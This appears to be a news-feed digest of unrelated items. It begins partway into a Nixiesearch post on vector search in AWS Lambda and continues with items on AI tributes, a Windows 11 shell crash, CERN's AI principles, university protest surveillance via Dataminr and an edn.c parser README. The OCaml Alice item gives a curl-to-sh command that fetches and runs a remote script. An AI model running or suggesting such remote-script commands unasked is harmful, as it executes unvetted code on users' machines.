Nixiesearch always was built with S3 block storage in mind. But as OpenSearch (and perhaps Elasticsearch Serverless) it uses S3 only for simple segment replication:

Segment replication with AWS S3.

As lambdas are ephemeral, we need to deliver index somehow to the search engine:

  • We can directly wrap all Lucene index access into S3 ReadObject calls. This might work, but HNSW vector search is an iterative graph traversal, which will ruin the latency. Slow (and expensive due to ~500 S3 reads per request) search, but no init time. But it sounds serverless!

  • We can do a good old segment replication from S3 to Lambda ephemeral storage . Then for a 2GB index and expected 100MB/s throughput our init time is going to be 2GB * 0.1GB/s = 20 seconds. But after that the search speed is going to be perfect with no extra costs.

Napkin storage costs math for 1M requests:

  • Direct S3 search with no caching : 500 S3 reads per request * 1M requests * 0.0004$/1000reads = 200$/month. Yes running an ES cluster is more expensive, but not much.

  • Segment replication : considering that 1M requests/month is around 0.5rps, it means that your lambda function is going to be always warm and there’s no repeated inits - you fetch the index once and only refresh changed segments. Then the cost is going to be around 0$ .

I don’t like the idea of an init taking half a minute - then we’re not much different from good old Elastic. But what if we host an index on an NFS (e.g. AWS EFS) storage?

  • AWS EFS : 1MB data read per search request * 1M requests * 0.03$/GB = 30$/month . Now math makes more sense: we have zero init time, but have extra latency for all disk access.

I took the FineWiki “simple” part with 300k documents, embedded them with OpenAI text-embedding-3-small model and deployed it on an AWS Lambda with EFS storage attached.

Nixiesearch can do ONNX embedding inference for sentence-transformers models locally, but considering an average embedding model size (1-2GB) and the amount of RAM/vCPU we have it might be not a good idea.

To have a fully-functional tech demo, I vibe-coded (oh no) a simple web front-end on GH pages: https://nixiesearch.github.io/lambda-demo-ui/

Blue gradient background is like an em-dash of vibe-coded front-ends.

There’s some nice server+client side latency breakdown if you want to see where the actual time is spent. And yes, 1.5s first request latency is kinda slower than I’ve initially expected.

In simple words, random reads from NFS-style storage are just slow:

breakdown of a sample request

As my test lambda runs in AWS us-east-1 and I’m physically in EU, latency can be improved by replicating lambda to more regions. Embedding latency is the AI toll we have to pay anyway. But why search and fetch stages are so slow?

Because both HNSW search and document fetch are a bunch of iterative random reads, and with per-read AWS EFS latency being around 1ms , that’s what we get.

One of reviewers of this post suggested to bake the whole index directly to the docker image as an alternative: yes, you cannot easily update the index in real-time anymore - you need to rebuild the Docker image from scratch every time you change it. But it may work in cases when you can tolerate some lag in indexing. But the results we got were even more surprising:

When you thought AWS EFS was slow, you should try baking index into docker image.

I thought 1.5s request latency with AWS EFS was slow, but doing random reads across an index backed directly to the docker image were even slower. Why? Because lambdas are not running docker images as-is: they unpack them and cache in an AZ-local S3 block cache:

In other words, baking index into a docker image is just another way of storing your index on AZ-local S3-Express bucket (and mounting it with s3-fuse or something).

Realistically 1.5s (and even 7s) per cold search might sound horrible, but things get fast pretty quickly as we eventually load cold data into a filesystem cache:

Image above is for Docker-bundled index, but for EFS/NFS attached it’s quite similar.

We get into a reasonable 120ms latency for search and almost instant field fetch around request #10. But it’s still far from the idealistic idea of true serverless search when you don’t need an idling warm node to be up to serve your request.

Folks like turbopuffer , topk and LanceDB advocate the idea that to run on top of S3 you need another non-HNSW data structure like IVF , which is more friendly to high access latency.

Instead of navigating over HNSW graph, iteratively doing ton of random reads, you can just cluster documents together and only perform batch reads of clusters lying nearby to your query:

  • Much easier search implementation without any iterative random reads patterns: just read a complete set of cluster documents in a single S3 GetObject request.

  • Clusters can be updated in-place by just appending new documents.

  • The elephant in the room: IFV have much much worse recall, especially for filtered search. So your search can be either fast or precise, you should choose in advance.

Yes I can just hack IFV support to Nixiesearch (as Lucene supports flat indexes already), but there’s a better way. S3 has almost unlimited concurrency: can we untangle reads from being iterative to being batched and concurrent?

Traversing HNSW graph for K-NN search is iterative:

  • You land on an entrypoint node, which has M connections to other neighbor nodes.

  • For each connection, you load its embedding (and do S3 GetObject request) and compute a cosine distance.

  • After all M neighbor distances are evaluated, you jump on the best next node.

Sequential reads, oh no!

But you don’t need to be iterative while loading neighbor embeddings: Lucene’s HnswGraphSearcher is already quite close to be bend into the direction for making embedding load concurrent and parallel:

So my personal plan for Christmas holidays is to add a custom Scorer implementation which schedules N parallel S3 GetObject requests to get N embeddings on each node visit:

  • HNSW graph usually has only ~3 layers, so you need to evaluate 1 entrypoint + 3 layers = 4 nodes, doing 4 batches of ~32-64 S3 requests.

  • Each batch of S3 GetObject requests is ~15ms, so baseline latency is expected to be ~60ms for a complete search stage.

  • To fetch N documents, you also need to prefetch N chunks of stored fields, which is also a perfectly concurrent operation.

A theoretical ~100ms baseline latency of HNSW running on top of S3 - sounds nice, huh?

Usually at the end of the article a well-educated author should put a summary of what you might learned while reading this, so here we are:

  • AWS Lambdas are not your friendly docker containers: storage system is completely different, and runtime semantics with constant freeze-thaw stages is what really surprised me.

  • Running HNSW search on top of network-attached storage is painfully slow right now - sequential random reads, you know. But there’s light at the end of the tunnel, and you don’t need to sacrifice recall for a cheap and fast search.

  • If you’re brave (and stupid) enough (like me) to spend a weekend on putting a search engine in a lambda, you can do it.

If you haven’t yet tried Nixiesearch, you should: https://github.com/nixiesearch/nixiesearch - a recent 0.8.0 version was used for all the experiments in this post.

Discussion about this post

‘Extra challenging during a difficult time’: Robert Redford’s daughter criticises AI tributes to the late actor

Guardian
www.theguardian.com
2025-11-24 11:04:46
Amy Redford thanks fans for ‘love and support’ but takes issue with ‘AI versions of funerals, tributes and quotes from members of my family that are fabrications’ Robert Redford’s daughter Amy Redford has criticised the proliferation of artificial intelligence tributes to her father, who died in Sep...
Original Article

Robert Redford’s daughter Amy Redford has criticised the proliferation of artificial intelligence tributes to her father, who died in September , calling them “fabrications”.

Redford posted a statement on social media in which she thanked fans for their “overwhelming love and support”, adding: “It’s clear that he meant so much to so many, and I know that my family is humbled by the outpouring of stories and tributes from all corners of the globe.”

skip past newsletter promotion

She went on to say: “There have been multiple AI versions of funerals, tributes and quotes from members of my family that are fabrications. Renderings of my dad who clearly has no say, and depictions of my family that do not represent anyone in a positive light are extra challenging during a difficult time.”

Redford said that no public funeral has taken place, and that a memorial to her father’s life is still being planned, saying: “Every family should have the ability to mourn, represent the person they lost, and pay homage in the way that fits their values and family culture best.”

Redford added: “My hope is to keep AI in the land of transparent usage where it belongs. There are many elements of it that were created with good intent. I simply ask, what if this was you? Let that be your guidepost.”

The Attention Economy Navigator, November 2025 w/ Nima Shirazi

OrganizingUp
convergencemag.com
2025-11-24 11:00:00
This week on the show we are debuting a new format we’re calling the Attention Economy Navigator. The goal of Block & Build has always been to help organizers figure out what’s happening, how people are responding, and get a sense for what’s working out there in the world. The Attention Economy ...

Microsoft: Windows 11 24H2 bug crashes Explorer and Start Menu

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 10:41:50
Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash after installing cumulative updates released since July 2025. [...]...
Original Article

Windows 11

Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash after installing cumulative updates released since July 2025.

This bug affects users who log in after applying the cumulative updates and those using non-persistent operating system installations (such as virtual desktop infrastructure environments), where app packages must reinstall each session. On impacted systems, it causes issues for multiple essential Windows 11 shell components when XAML dependency packages fail to register properly after updates.

As Microsoft explained in a recent support document, applications that depend on XAML packages (specifically MicrosoftWindows.Client.CBS, Microsoft.UI.Xaml.CBS, and MicrosoftWindows.Client.Core) aren't registering in time after an update is installed, a timing issue that cascades through the system, preventing critical interface components from initializing properly.

Wiz

This causes shell components such as Explorer.exe, StartMenuExperienceHost, and ShellHost.exe to crash with visible errors or fail silently, leaving users with partially functional systems that cannot display various navigation tools.

Affected users can experience a wide range of problems, including Start menu crashes (often accompanied by critical error messages), missing taskbars even when Explorer.exe is running, the core ShellHost (Shell Infrastructure Host or Windows Shell Experience Host) system process crashing, and the Settings app silently failing to launch.

"After provisioning a PC with a Windows 11, version 24H2 monthly cumulative update released on or after July 2025 (KB5062553), various apps such as StartMenuExperiencehost, Search, SystemSettings, Taskbar or Explorer might experience difficulties," Microsoft said .

"The applications have dependency on XAML packages that are not registering in time after installing the update. We are working on a resolution and will provide more information when it is available."

Temporary workaround available

Microsoft stated it's developing a resolution but hasn't provided a timeline for the fix. While Microsoft continues to work on a permanent fix, it has provided PowerShell commands to manually register the missing packages.

Affected users must run these three Add-AppxPackage commands targeting each affected XAML package, then restart the system to restore functionality:

Add-AppxPackage -Register -Path 'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\appxmanifest.xml' -DisableDevelopmentMode
Add-AppxPackage -Register -Path 'C:\Windows\SystemApps\Microsoft.UI.Xaml.CBS_8wekyb3d8bbwe\appxmanifest.xml' -DisableDevelopmentMode
Add-AppxPackage -Register -Path 'C:\Windows\SystemApps\MicrosoftWindows.Client.Core_cw5n1h2txyewy\appxmanifest.xml' -DisableDevelopmentMode 

However, the bug particularly impacts organizations managing non-persistent enterprise environments using virtual desktop infrastructure, where employees must re-provision applications at each login.

For them, Microsoft recommends running this logon script on non-persistent OS installations that will execute before Explorer launches. The batch file wrapper ensures required packages are fully provisioned before the desktop environment loads, preventing the timing race condition.

Last week, Nvidia also released a GeForce Hotfix Display Driver to address gaming performance issues triggered by the KB5066835 Windows 11 October 2025 cumulative update, while Microsoft released out-of-band emergency updates to fix extended security updates (ESU) install errors and a Windows 11 hotpatch install loop .

Wiz

The 2026 CISO Budget Benchmark

It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.

Learn how top leaders are turning investment into measurable impact.

Shai-Hulud Returns: Over 300 NPM Packages Infected

Hacker News
helixguard.ai
2025-11-24 10:40:22
Comments...

General principles for the use of AI at CERN

Hacker News
home.web.cern.ch
2025-11-24 10:37:05
Comments...
Original Article

Artificial intelligence (AI) can be found at CERN in many contexts: embedded in devices, software products and cloud services procured by CERN, brought on-site by individuals or developed in-house.

Following the approval of a CERN-wide AI strategy , these general principles are designed to promote the responsible and ethical use, development and deployment (collectively “use”) of AI at CERN.

They are technology neutral and apply to all AI technologies as they become available.

The principles apply across all areas of CERN’s activities, including:

  • AI for scientific and technical research : data analysis, anomaly detection, simulation, predictive maintenance and optimisation of accelerator performance or detector operations, and
  • AI for productivity and administrative use : document drafting, note taking, automated translation, language correction and enhancement, coding assistants, and workflow automation.

General Principles

CERN, members of its personnel, and anyone using CERN computing facilities shall ensure that AI is used in accordance with the following principles:

  1. Transparency and explainability : Document and communicate when and how AI is used, and how AI contributes to specific tasks or decisions.
  2. Responsibility and accountability : The use of AI, including its impact and resulting outputs throughout its lifecycle, must not displace ultimate human responsibility and accountability.
  3. Lawfulness and conduct : The use of AI must be lawful, compliant with CERN’s internal legal framework and respect third-party rights and CERN’s Code of Conduct.
  4. Fairness, non-discrimination, and “do no harm” : AI must be used in a way that promotes fairness and inclusiveness and prevents bias, discrimination and any other form of harm.
  5. Security and safety : AI must be adequately protected to reduce the likelihood and impact of cybersecurity incidents. AI must be used in a way that is safe, respects confidentiality, integrity and availability requirements, and prevents negative outcomes.
  6. Sustainability : The use of AI must be assessed with the goal of mitigating environmental and social risks and enhancing CERN's positive impact in relation to society and the environment.
  7. Human oversight : The use of AI must always remain under human control. Its functioning and outputs must be consistently and critically assessed and validated by a human.
  8. Data privacy : AI must be used in a manner that respects privacy and the protection of personal data.
  9. Non-military purposes : Any use of AI at CERN must be for non-military purposes only.
Diagram of main points of AI strategy
A one-page summary of the main themes of the CERN AI strategy (click the image to see a larger version)

What are you doing this week?

Lobsters
lobste.rs
2025-11-24 10:10:21
What are you doing this week? Feel free to share! Keep in mind it’s OK to do nothing at all, too....
Original Article

What are you doing this week? Feel free to share!

Keep in mind it’s OK to do nothing at all, too.

Alice - new build system for Ocaml

Lobsters
www.alicecaml.org
2025-11-24 10:04:16
Comments...
Original Article

Alice is a radical, experimental OCaml build system and package manager. Its goal is to allow anyone to program in OCaml with as little friction as possible.

Install Alice by running the following command:

curl -fsSL https://alicecaml.org/install.sh | sh

Alternatively, see more installation options here .

Here’s how to run your first OCaml program on a computer with no pre-installed OCaml tools (you will need a C compiler though!):

$ alice tools install
$ alice new hello
$ cd hello
$ alice run

Hello, World!

That first line downloads an OCaml compiler toolchain and a couple of development tools ( ocamllsp and ocamlformat ). Skip it if you already have an existing installation of OCaml. Alice runs the OCaml compiler ( ocamlopt.opt ) searching the directories in your PATH variable and only uses its own installation of the tools (installed by alice tools install ) as a fallback.

This project is exploring alternative approaches to OCaml packaging than those chosen by Opam and alternative approaches to building projects than those chosen by Dune .

How Corporate Partnerships Powered University Surveillance of Palestine Protests

Intercept
theintercept.com
2025-11-24 10:00:00
Officials at the University of Houston used Dataminr to surveil students, while University of Connecticut administrators voiced concerns over protests against a military contractor and major donor. The post How Corporate Partnerships Powered University Surveillance of Palestine Protests appeared fir...
Original Article

A cluster of tents had sprung up on the University of Houston’s central lawn. Draped in keffiyehs and surrounded by a barricade of plywood pallets, students stood on a blue tarp spread over the grass. Tensions with administrators were already high before students pitched their tents, with incidents like pro-Palestine chalk messages putting university leaders on high alert.

What the students didn’t know at the time was that the University of Houston had contracted with Dataminr, an artificial intelligence company with a troubling record on constitutional rights , to gather open-source intelligence on the student-led movement for Palestine. Using an AI tool known as “First Alert,” Dataminr was scraping students’ social media activity and chat logs and sending what it learned to university administration.

This is the first detailed reporting on how a U.S. university used the AI technology to surveil its own students. It’s just one example of how public universities worked with private partners to surveil student protests, revealing how corporate involvement in higher education can be leveraged against students’ free expression.

This is the final installment in an investigative series on the draconian surveillance practices that universities across the country employed to crack down on the 2024 pro-Palestine encampments and student protests. More than 20,000 pages of documentation covering communications from April and May 2024, which The Intercept obtained via public records requests, reveal a systematic pattern of surveillance by U.S. universities in response to their students’ dissent. Public universities in California tapped emergency response funds for natural disasters to quell protests; in Ohio and South Carolina, schools received briefings from intelligence-sharing fusion centers ; and at the University of Connecticut, student participation in a protest sent administrators into a frenzy over what a local military weapons manufacturer would think.

The series traces how universities, as self-proclaimed safe havens of free speech, exacerbated the preexisting power imbalance between institutions with billion-dollar endowments and a nonviolent student movement by cracking down on the latter. It offers a preview of the crackdown to come under the Trump administration as the president re-entered office and demanded concessions from U.S. universities in an attempt to limit pro-Palestine dissent on college campuses.

“Universities have a duty of care for their students and the local community,” Rory Mir, associate director of community organizing at the Electronic Frontier Foundation, told The Intercept. “Surveillance systems are a direct affront to that duty for both. It creates an unsafe environment, chills speech, and destroys trust between students, faculty, and the administration.”

At the University of Houston, the encampment was treated as an unsafe environment. University communications officials using Dataminr forwarded the alerts — which consist of an incident location and an excerpt of the scraped text — directly to the campus police. One alert sent by Dataminr to a University of Houston communications official identified a potential pro-Palestine incident based on chat logs it scraped from a semi-private Telegram channel called “Ghosts of Palestine.”

“University of Houston students rise up for Gaza, demanding an end to Genocide,” the chat stated. First Alert flagged it as an incident of concern and forwarded the information to university officials.


According to Dataminr’s marketing materials, First Alert is designed for use by first responders, sending incident reports to help law enforcement officials gather situational awareness. But instead of relying on officers to collect the intelligence themselves, First Alert relies on Dataminr’s advanced algorithm to gather massive amounts of data and make decisions. In short, Dataminr’s powerful algorithm gathers intelligence, selects what it views to be important, and then forwards it to the paying client.

A follow-up public records request sent to the University of Houston returned records of more than 900 First Alert emails in the inbox of a university administrator, only in April 2024.

The AI company has been implicated in a number of scandals, including the domestic surveillance of Black Lives Matter protesters in 2020 and abortion rights protesters in 2023. The Intercept reported in April that the Los Angeles Police Department used First Alert to monitor pro-Palestine demonstrations in LA. First Alert is one, but not the only, service that Dataminr offers. For newsrooms to corporate giants, Dataminr’s powerful algorithms power intelligence gathering and threat response for those willing to pay.

“It’s concerning enough when you see evidence of university officials scrolling through individual student social media, that’s going to chill people’s speech,” said Nathan Wessler, deputy director of the ACLU’s Speech, Privacy, and Technology Project. “But it’s a whole other level of concern when you start contracting with these companies that are using some kind of algorithm to analyze, at scale, people’s speech online.”

The University of Houston and Dataminr did not respond to multiple requests for comment.

While the University of Houston leaned on Dataminr to gather intelligence on the student-led movement for Palestine, it is just one example of the open-source intelligence practices used by universities in the spring of 2024. From screenshots of students’ Instagram posts to the use of on-campus surveillance cameras, the documents obtained by The Intercept illustrate how the broadening net of on-campus intelligence gathering swept up constitutionally protected speech in the name of “social listening.”

University communications officials were often left to do the heavy lifting of hunting down activists’ social media accounts to map out planned demonstrations. Posts by local Students for Justice in Palestine chapters of upcoming demonstrations were frequently captured by administrators and forwarded on. In other cases, university administrators relied on in-person intelligence gathering.

One set of communication in the documents suggests that at one point, University of Connecticut administrators were watching the students in the on-campus encampment sleep. “They are just beginning to wake up. It’s still very quiet. Just a couple of police cars nearby,” a UConn administrator wrote to other officials that April.

U.S. universities, faced with the largest student protest movement in decades, used open-source intelligence to monitor the student-led movement for Palestine and to inform whether or not they would negotiate, and eventually, how they would clear the encampments. Emily Tucker, the executive director of the Center on Privacy and Technology at Georgetown Law, situated the development as part of the broader corporatization of U.S. higher education.

“ Institutions that are supposed to be for the public good are these corporate products that make them into vehicles for wealth extraction via data products,” Tucker told The Intercept. “Universities are becoming more like for-profit branding machines, and at the same time, digital capitalism is exploding.”

At UConn, the relationship between the corporate world and higher education led to a brief panic among university administrators. After protesters, including members of UConn’s chapter of Students for Justice in Palestine and a campus group called Unchained, blocked access to a military aircraft manufacturing facility about 25 miles from campus, administrators went into a frenzy over what the military contractor would think.

“Ok. The P&W CEO is pretty upset with us about it right now and is pressing [University President] Radenka [Maric] for action,” wrote Nathan Fuerst to Kimberly Beardsley-Carr, both high-level UConn administrators. “Can you see if UConn PD can proactively reach out? If we can determine that no UConn Students were arrested, that would be immensely helpful.”

Fuerst was referring to a contractor for the Israeli military called Pratt & Whitney, a subsidiary of the $235 billion company formerly known as Raytheon — and a major UConn donor. Both UConn and Pratt & Whitney denied that the request occurred, pointing out that the military contractor has no CEO. Fuerst, Beardsley-Carr, and Maric did not respond to requests for comment.

Photo Illustration: Fei Liu / The Intercept

Beardsley-Carr, in her own email sent four minutes after Fuerst’s, repeated the request: “As you can see below, the President is getting pressure from the CEO of Pratt and Whitney.”

Whether the company made the request or if it was, as UConn spokesperson Stephanie Reitz told The Intercept, “a misunderstanding,” it’s clear from the communications that UConn administrators were concerned about what the weapons manufacturer would think — and sprang to action, gathering information on students because of it.

Pratt & Whitney has donated millions of dollars to various university initiatives, and in April 2024, the same month as the protest, it was announced that a building on campus would be rededicated as the “Pratt & Whitney Engineering Building.” A partnership between the school and the company received an honorable mention from the governor’s office, prompting a Pratt & Whitney program engineer to write in an email: “It’s wonderful! P&W and UCONN have done some great things together.”

After a flurry of emails over the Pratt & Whitney arrests, on April 25, the UConn administrators’ concerns were lifted. “Middletown PD provided me with the names of the 10 individuals arrested during the below incident. None of the arrestees are current students,” UConn Police Lieutenant Douglas Lussier wrote to Beardsley-Carr.

“You have no idea how happy you just made me,” Beardsley-Carr wrote back.

It’s not just UConn, but U.S. higher education as a whole that has a deep and long-standing relationship with military weapons manufacturers. Whether it is endowed professorships, “Lockheed Martin Days,” defense industry presence at career fairs, or private donations, the defense industry has a hold on U.S. higher education, especially at elite universities, which serve as training grounds for high-paying and influential careers.

“These universities are the epicenter, the home base, of the future generation of Americans, future policy makers,” said Tariq Kenney-Shawa, Al-Shabaka’s U.S. Policy Fellow. If universities “were so confident in Israel’s narrative and their narrative being the correct one,” Kenney-Shawa added, “they would let that debate in such important spaces play out.”

Some students who spoke with The Intercept emphasized that as a result of the surveillance they encountered during the protests, they have stepped up their digital security, using burner phones and limiting communication about potential demonstrations to secure messaging channels.

“ The campus is waiting and watching for these kinds of things,” said Kirk Wolff, a student at the University of Virginia who said he was threatened with expulsion for a one-man sit-in he staged on campus and expressed fear that university administrators would read his emails.

The surveillance had a “chilling effect,” in his experience, Wolff said. “ I had so many people tell me that they wanted to join me, that they agreed with me, and that they simply could not, because they were scared that the school would turn over their information.”

The University of Virginia did not respond to a request for comment on Wolff’s claims.

The surveillance detailed in this investigation took place under the Biden administration, before Trump returned to power and dragged the crackdown on pro-Palestine dissent into the open. Universities have since shared employee and student files with the Trump administration as it continues to investigate “anti-Semitic incidents on campus” — and use the findings as pretext to defund universities or even target students for illegal deportation.

Any open-source intelligence universities gathered could become fair game for federal law enforcement agencies as they work to punish those involved in the student-led movement for Palestine, Mir noted.

“A groundwork of surveillance has been built slowly on many college campuses for decades,” he said. “Now very plainly and publicly we have seen it weaponized against speech.”

Research support provided by the nonprofit newsroom Type Investigations.

edn.c: A fast, zero-copy EDN (Extensible Data Notation) reader written in C11 with SIMD acceleration

Lobsters
github.com
2025-11-24 09:50:20
Comments...
Original Article

EDN.C

A fast, zero-copy EDN (Extensible Data Notation) reader written in C11 with SIMD acceleration.

CI License: MIT

TL;DR - What is EDN?

EDN (Extensible Data Notation) is a data format similar to JSON, but richer and more extensible. Think of it as "JSON with superpowers":

  • JSON-like foundation : Maps {:key value} , vectors [1 2 3] , strings, numbers, booleans, null ( nil )
  • Additional built-in types : Sets #{:a :b} , keywords :keyword , symbols my-symbol , characters \newline , lists (1 2 3)
  • Extensible via tagged literals : #inst "2024-01-01" , #uuid "..." —transform data at parse time with custom readers
  • Human-friendly : Comments, flexible whitespace, designed to be readable and writable by both humans and programs
  • Language-agnostic : Originally from Clojure, but useful anywhere you need rich, extensible data interchange

Why EDN over JSON? More expressive types (keywords, symbols, sets), native extensibility through tags (no more {"__type": "Date", "value": "..."} hacks), and better support for configuration files and data interchange in functional programming environments.

Learn more: Official EDN specification

Features

  • 🚀 Fast : SIMD-accelerated parsing with NEON (ARM64), SSE4.2 (x86_64) and SIMD128 (WebAssembly) support
  • 🌐 WebAssembly : Full WASM SIMD128 support for high-performance parsing in browsers and Node.js
  • 💾 Zero-copy : Minimal allocations, references input data where possible
  • 🎯 Simple API : Easy-to-use interface with comprehensive type support
  • 🧹 Memory-safe : Arena allocator for efficient cleanup - single edn_free() call
  • 🔧 Zero Dependencies : Pure C11 with standard library only
  • ✅ Fully Tested : 340+ tests across 24 test suites
  • 📖 UTF-8 Native : All string inputs and outputs are UTF-8 encoded
  • 🏷️ Tagged Literals : Extensible data types with custom reader support
  • 🗺️ Map Namespace Syntax : Clojure-compatible #:ns{...} syntax (optional, disabled by default)
  • 🔤 Extended Characters : \formfeed , \backspace , and octal \oNNN literals (optional, disabled by default)
  • 📝 Metadata : Clojure-style metadata ^{...} syntax (optional, disabled by default)
  • 📄 Text Blocks : Java-style multi-line text blocks """\n...\n""" (experimental, disabled by default)
  • 🔢 Ratio Numbers : Clojure-compatible ratio literals 22/7 (optional, disabled by default)
  • 🔣 Extended Integers : Hex ( 0xFF ), octal ( 0777 ), binary ( 2r1010 ), and arbitrary radix ( 36rZZ ) formats (optional, disabled by default)
  • 🔢 Underscore in Numeric Literals : Visual grouping with underscores 1_000_000 , 3.14_15_92 , 0xDE_AD_BE_EF (optional, disabled by default)

Table of Contents

Installation

Requirements

  • C11 compatible compiler (GCC 4.9+, Clang 3.1+, MSVC 2015+)
  • Make (Unix/macOS) or CMake (Windows/cross-platform)
  • Supported platforms:
    • macOS (Apple Silicon M1/M2/M3, Intel) - NEON/SSE4.2 SIMD
    • Linux (ARM64, x86_64) - NEON/SSE4.2 SIMD
    • Windows (x86_64, ARM64) - NEON/SSE4.2 SIMD via MSVC/MinGW/Clang
    • WebAssembly - SIMD128 support for browsers and Node.js

Build Library

Unix/macOS/Linux:

# Clone the repository
git clone https://github.com/DotFox/edn.c.git
cd edn.c

# Build static library (libedn.a)
make

# Run tests to verify build
make test

Windows:

# Clone the repository
git clone https://github.com/DotFox/edn.c.git
cd edn.c

# Build with CMake (works with MSVC, MinGW, Clang)
.\build.bat

# Or use PowerShell script
.\build.ps1 -Test

See docs/WINDOWS.md for detailed Windows build instructions.

Integrate Into Your Project

Option 1: Link static library

# Compile your code
gcc -o myapp myapp.c -I/path/to/edn.c/include -L/path/to/edn.c -ledn

# Or add to your Makefile
CFLAGS += -I/path/to/edn.c/include
LDFLAGS += -L/path/to/edn.c -ledn

Option 2: Include source directly

Copy include/edn.h and all files from src/ into your project and compile them together.

Quick Start

#include "edn.h"
#include <stdio.h>

int main(void) {
    const char *input = "{:name \"Alice\" :age 30 :languages [:clojure :rust]}";
    
    // Read EDN string
    edn_result_t result = edn_read(input, 0);
    
    if (result.error != EDN_OK) {
        fprintf(stderr, "Parse error at line %zu, column %zu: %s\n",
                result.error_line, result.error_column, result.error_message);
        return 1;
    }
    
    // Access the parsed map
    edn_value_t *map = result.value;
    printf("Parsed map with %zu entries\n", edn_map_count(map));
    
    // Look up a value by key
    edn_result_t key_result = edn_read(":name", 0);
    edn_value_t *name_value = edn_map_lookup(map, key_result.value);
    
    if (name_value != NULL && edn_type(name_value) == EDN_TYPE_STRING) {
        size_t len;
        const char *name = edn_string_get(name_value, &len);
        printf("Name: %.*s\n", (int)len, name);
    }
    
    // Clean up - frees all allocated memory
    edn_free(key_result.value);
    edn_free(map);
    
    return 0;
}

Output:

Parsed map with 3 entries
Name: Alice

Whitespace and Control Characters

EDN.C follows Clojure's exact behavior for whitespace and control character handling:

Whitespace Characters

The following characters act as whitespace delimiters (separate tokens):

Character Hex Name Common Use
0x20 Space Standard spacing
\t 0x09 Tab Indentation
\n 0x0A Line Feed (LF) Unix line ending
\r 0x0D Carriage Return (CR) Windows line ending
\f 0x0C Form Feed Page break
\v 0x0B Vertical Tab Vertical spacing
, 0x2C Comma Optional separator
FS 0x1C File Separator Data separation
GS 0x1D Group Separator Data separation
RS 0x1E Record Separator Data separation
US 0x1F Unit Separator Data separation

Examples:

// All of these parse as vectors with 3 elements:
edn_read("[1 2 3]", 0);          // spaces
edn_read("[1,2,3]", 0);          // commas
edn_read("[1\t2\n3]", 0);        // tabs and newlines
edn_read("[1\f2\x1C3]", 0);      // formfeed and file separator

Control Characters in Identifiers

Control characters 0x00-0x1F (except whitespace delimiters) are valid in identifiers (symbols and keywords):

Valid identifier characters:

  • 0x00 - 0x08 : NUL, SOH, STX, ETX, EOT, ENQ, ACK, BEL, Backspace
  • 0x0E - 0x1B : Shift Out through Escape

Examples:

// Backspace in symbol - valid!
edn_result_t r = edn_read("[\bfoo]", 0);  // 1-element vector
edn_vector_count(r.value);  // Returns 1
edn_free(r.value);

// Control characters in middle of identifier
const char input[] = {'[', 'f', 'o', 'o', 0x08, 'b', 'a', 'r', ']', 0};
r = edn_read(input, sizeof(input) - 1);
edn_vector_count(r.value);  // Returns 1 (symbol: "foo\bbar")
edn_free(r.value);

// Versus whitespace - separates into 2 elements
edn_result_t r2 = edn_read("[foo\tbar]", 0);  // Tab is whitespace
edn_vector_count(r2.value);  // Returns 2 (symbols: "foo" and "bar")
edn_free(r2.value);

Note on null bytes ( 0x00 ): When using string literals with strlen() , null bytes will truncate the string. Always pass explicit length for data containing null bytes:

const char data[] = {'[', 'a', 0x00, 'b', ']', 0};
edn_result_t r = edn_read(data, 5);  // Pass exact length: 5 bytes (excluding terminator)

API Reference

Core Functions

edn_read()

Read EDN from a UTF-8 string.

edn_result_t edn_read(const char *input, size_t length);

Parameters:

  • input : UTF-8 encoded string containing EDN data (must remain valid for zero-copy strings)
  • length : Length of input in bytes, or 0 to use strlen(input)

Returns: edn_result_t containing:

  • value : Parsed EDN value (NULL on error)
  • error : Error code ( EDN_OK on success)
  • error_line , error_column : Error location (1-indexed)
  • error_message : Human-readable error description

Important: The returned value must be freed with edn_free() .

edn_free()

Free an EDN value and all associated memory.

void edn_free(edn_value_t *value);

Parameters:

  • value : Value to free (may be NULL)

Note: This frees the entire value tree. Do not call free() on individual values.

edn_type()

Get the type of an EDN value.

edn_type_t edn_type(const edn_value_t *value);

Returns: One of:

  • EDN_TYPE_NIL
  • EDN_TYPE_BOOL
  • EDN_TYPE_INT (int64_t)
  • EDN_TYPE_BIGINT (arbitrary precision integer)
  • EDN_TYPE_FLOAT (double)
  • EDN_TYPE_BIGDEC (exact precision decimal)
  • EDN_TYPE_RATIO (rational number, requires RATIO=1 build flag)
  • EDN_TYPE_CHARACTER (Unicode codepoint)
  • EDN_TYPE_STRING
  • EDN_TYPE_SYMBOL
  • EDN_TYPE_KEYWORD
  • EDN_TYPE_LIST
  • EDN_TYPE_VECTOR
  • EDN_TYPE_MAP
  • EDN_TYPE_SET
  • EDN_TYPE_TAGGED

Type System

Error Codes

typedef enum {
    EDN_OK = 0,                    // Success
    EDN_ERROR_INVALID_SYNTAX,      // Syntax error
    EDN_ERROR_UNEXPECTED_EOF,      // Unexpected end of input
    EDN_ERROR_OUT_OF_MEMORY,       // Allocation failure
    EDN_ERROR_INVALID_UTF8,        // Invalid UTF-8 sequence
    EDN_ERROR_INVALID_NUMBER,      // Malformed number
    EDN_ERROR_INVALID_STRING,      // Malformed string
    EDN_ERROR_INVALID_ESCAPE,      // Invalid escape sequence
    EDN_ERROR_UNMATCHED_DELIMITER, // Mismatched brackets
    EDN_ERROR_UNKNOWN_TAG,         // Unregistered tag (with ERROR mode)
    EDN_ERROR_DUPLICATE_KEY,       // Map has duplicate keys
    EDN_ERROR_DUPLICATE_ELEMENT    // Set has duplicate elements
} edn_error_t;

Scalar Types

Strings

const char *edn_string_get(const edn_value_t *value, size_t *length);

Get UTF-8 string data. Returns NULL if value is not a string.

Lazy decoding: For strings without escapes, returns a pointer into the original input (zero-copy). For strings with escapes ( \n , \t , \" , etc.), decodes and caches the result on first call.

Example:

edn_result_t r = edn_read("\"Hello, world!\"", 0);
size_t len;
const char *str = edn_string_get(r.value, &len);
printf("%.*s\n", (int)len, str);
edn_free(r.value);

Booleans and Nil

bool edn_is_nil(const edn_value_t *value);

Check if value is nil. Returns true if value is EDN_TYPE_NIL , false otherwise.

Example:

edn_result_t r = edn_read("nil", 0);
if (edn_is_nil(r.value)) {
    printf("Value is nil\n");
